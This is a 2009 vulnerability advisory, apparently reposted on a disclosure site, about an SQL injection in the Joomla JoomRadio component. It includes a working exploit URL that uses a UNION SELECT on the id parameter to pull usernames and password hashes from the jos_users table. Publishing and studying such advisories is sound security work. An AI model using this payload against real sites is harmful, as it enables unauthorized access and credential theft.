Joomla Component com_joomradio SQL Injection

2009.02.19

Credit: 0o_zeus_o0

Risk: Low

Local: No

Remote: No

CVE: N/A

CWE: CWE-89

###########################################################################
# Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c_at_hotmail&#46;com
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# autor script:author XrByte <info_at_exp&#46;ee>, Grusha <grusha_at_feellove&#46;eu>
##################################################################
#
#Example:
##################################################################
#htp://
victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
SELECT
user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
FROM jos_users--
#
##################################################################
#greetz:
#
# original advisorie: http://www.securitybroken.com
##################################################################

References:

http://seclists.org/fulldisclosure/2009/Feb/0203.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_joomradio SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.